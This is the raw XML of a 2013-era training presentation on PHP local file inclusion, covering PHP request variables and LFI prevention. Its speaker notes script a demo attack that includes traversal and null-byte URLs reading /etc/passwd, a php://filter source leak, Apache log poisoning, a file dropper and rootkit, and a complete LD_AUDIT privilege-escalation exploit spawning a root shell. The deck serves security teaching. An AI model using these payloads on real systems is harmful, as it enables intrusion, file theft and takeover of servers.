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9"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="297" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="263" r:id="rId6"/>
    <p:sldId id="264" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="269" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="270" r:id="rId12"/>
    <p:sldId id="286" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="272" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="287" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="300" r:id="rId19"/>
    <p:sldId id="275" r:id="rId20"/>
    <p:sldId id="299" r:id="rId21"/>
    <p:sldId id="293" r:id="rId22"/>
    <p:sldId id="294" r:id="rId23"/>
    <p:sldId id="277" r:id="rId24"/>
    <p:sldId id="278" r:id="rId25"/>
    <p:sldId id="279" r:id="rId26"/>
    <p:sldId id="288" r:id="rId27"/>
    <p:sldId id="280" r:id="rId28"/>
    <p:sldId id="281" r:id="rId29"/>
    <p:sldId id="282" r:id="rId30"/>
    <p:sldId id="298" r:id="rId31"/>
    <p:sldId id="295" r:id="rId32"/>
    <p:sldId id="296" r:id="rId33"/>
    <p:sldId id="289" r:id="rId34"/>
    <p:sldId id="276" r:id="rId35"/>
    <p:sldId id="284" r:id="rId36"/>
    <p:sldId id="290" r:id="rId37"/>
    <p:sldId id="285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55" autoAdjust="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7F359D-4895-493E-8E4A-7E3A3E254870}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/25/2013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6A27E5-3269-47E3-95A1-6012B26B720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A27E5-3269-47E3-95A1-6012B26B7202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Explain string concatenation on second example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example 1 would error if file was empty, really bad no validation at all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example 2 would not error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> if empty, still pretty bad because of null byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Demo scripts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A27E5-3269-47E3-95A1-6012B26B7202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Explain string concatenation on second example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example 1 would error if file was empty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example 2 would not error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> if empty, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>Demo scripts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A27E5-3269-47E3-95A1-6012B26B7202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Show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>whitelisted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> script /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/www/html/samples/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lfi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/example4.php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A27E5-3269-47E3-95A1-6012B26B7202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Hidden inside a jpg file uploaded as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> your avatar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>logfiles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A27E5-3269-47E3-95A1-6012B26B7202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A27E5-3269-47E3-95A1-6012B26B7202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http://demoip/samples/lfi/php.gif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A27E5-3269-47E3-95A1-6012B26B7202}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"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 smtClean="0"/>
              <a:t>Proceed with demo,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> revert to  slides when appropriate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>start with some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> basics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>talk about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> request parameters and how they are used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"fruit of the poisoned tree"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>now, let's dig in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>show index.php page ask if anyone thinks it is an issue  ( move on to step by step working demo ) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>approach as an external view, no inside knowledge, complete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> including privilege escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>we found a weird website that our scanner says is probably vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lfi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lets manually investigate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>view 404 page to see website banner info, note down for later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>try to grab /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  via directory recursion  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://172.30.0.58/index.php?news=../../../../../../../../etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hmm, isn't working...  let's take a look at the source code of index.php using our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lfi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http://172.30.0.58/index.php?news=php://filter/convert.base64-encode/resource=index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>base64 decode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>oh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> source code...  (revisited)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>aha!  they are appending .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, no problem, lets use null byte to bypass the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php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http://172.30.0.58/index.php?news=../../../../../../../../etc/passwd%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>oh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>what other goodies can we find?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-release / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-release  (verify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>os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locate apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>logfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  (guessing via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> version, or using script to check presence of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>logfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>drop a unique string into access log, and lets look for it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>once we have located the apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>logfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lets start dropping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code into it and include for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>funzies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drop very simple file dropper into /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> via base64 decode functions via telnet HTTP GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use file dropper to upload more sophisticated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rootkit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use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to escalate to root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> version, and local privilege escalation vulnerability to gain root )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in this case use http://news.ycombinator.com/item?id=1810291</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/exploit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ln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /bin/ping /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/exploit/target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  exec 999&lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/exploit/target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rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/exploit/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  echo 'void __attribute__((constructor)) init(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(0);system("/bin/bash");}' | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -w -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fPIC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -shared -o /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/exploit -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  LD_AUDIT="\$ORIGIN" exec /proc/self/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/999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A27E5-3269-47E3-95A1-6012B26B7202}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"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A27E5-3269-47E3-95A1-6012B26B7202}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"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A27E5-3269-47E3-95A1-6012B26B7202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Point out the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> block within the html, variable creation and use.  Semicolons.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A27E5-3269-47E3-95A1-6012B26B7202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http://php.net/manual/en/function.include.php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A27E5-3269-47E3-95A1-6012B26B7202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http://php.net/manual/en/function.eval.php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A27E5-3269-47E3-95A1-6012B26B7202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Sample include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> , header, footer .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> files  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/www/html/samples/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Show in editor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Require same as include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A27E5-3269-47E3-95A1-6012B26B7202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Explain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>differences between get and post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A27E5-3269-47E3-95A1-6012B26B7202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Demo upload.php and form.php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A27E5-3269-47E3-95A1-6012B26B7202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A27E5-3269-47E3-95A1-6012B26B7202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FE6CBE3-C0FD-4C39-8121-1028E476CB47}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/25/2013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F51122-C579-483D-9A0C-10F7F09EBAC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6CBE3-C0FD-4C39-8121-1028E476CB47}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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1122-C579-483D-9A0C-10F7F09EBA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FE6CBE3-C0FD-4C39-8121-1028E476CB47}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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3F51122-C579-483D-9A0C-10F7F09EBAC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6CBE3-C0FD-4C39-8121-1028E476CB47}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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F51122-C579-483D-9A0C-10F7F09EBAC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6CBE3-C0FD-4C39-8121-1028E476CB47}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/25/2013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3F51122-C579-483D-9A0C-10F7F09EBAC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FE6CBE3-C0FD-4C39-8121-1028E476CB47}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/25/2013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3F51122-C579-483D-9A0C-10F7F09EBAC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FE6CBE3-C0FD-4C39-8121-1028E476CB47}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/25/2013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3F51122-C579-483D-9A0C-10F7F09EBAC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6CBE3-C0FD-4C39-8121-1028E476CB47}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/25/2013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F51122-C579-483D-9A0C-10F7F09EBA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6CBE3-C0FD-4C39-8121-1028E476CB47}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/25/2013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F51122-C579-483D-9A0C-10F7F09EBA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6CBE3-C0FD-4C39-8121-1028E476CB47}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/25/2013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F51122-C579-483D-9A0C-10F7F09EBAC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FE6CBE3-C0FD-4C39-8121-1028E476CB47}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/25/2013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3F51122-C579-483D-9A0C-10F7F09EBAC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FE6CBE3-C0FD-4C39-8121-1028E476CB47}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/25/2013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3F51122-C579-483D-9A0C-10F7F09EBAC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php.net/manual/en/language.types.array.php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hp.net/manual/en/reserved.variables.cookies.php" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/en/reserved.variables.post.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/en/reserved.variables.get.php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news.ycombinator.com/item?id=1810291" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-technique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h3ll.org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php.net/manual/en/reserved.variables.session.php" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/en/reserved.variables.server.php" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/en/reserved.variables.cookies.php" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/en/reserved.variables.globals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hp.net/manual/en/reserved.variables.files.php" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/en/reserved.variables.post.php" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/en/reserved.variables.environment.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/en/reserved.variables.get.php" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://php.net/manual/en/reserved.variables.request.php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search?q=banana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Local File Inclusion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Types, exploitation, and prevention</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47106" name="Picture 2" descr="PH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4495800"/>
            <a:ext cx="1143000" cy="638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Request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$_REQUEST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>An associative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> that by default contains the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>$_COOKIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Using the $_REQUEST[“variable”] syntax the application does not care whether the variable is filled from GET or POST.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Using the $_GET or $_POST arrays will only be filled if the variables are posted or retrieved via GET or POST respectively.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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Choose carefully based on the purpose of the app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File Inclusion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8153400" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local file inclusion is when a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> app is written to include files on the local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>filesytem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sz="2400" dirty="0" smtClean="0"/>
              <a:t>(Remember include() from before?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LFI exploits </a:t>
            </a:r>
          </a:p>
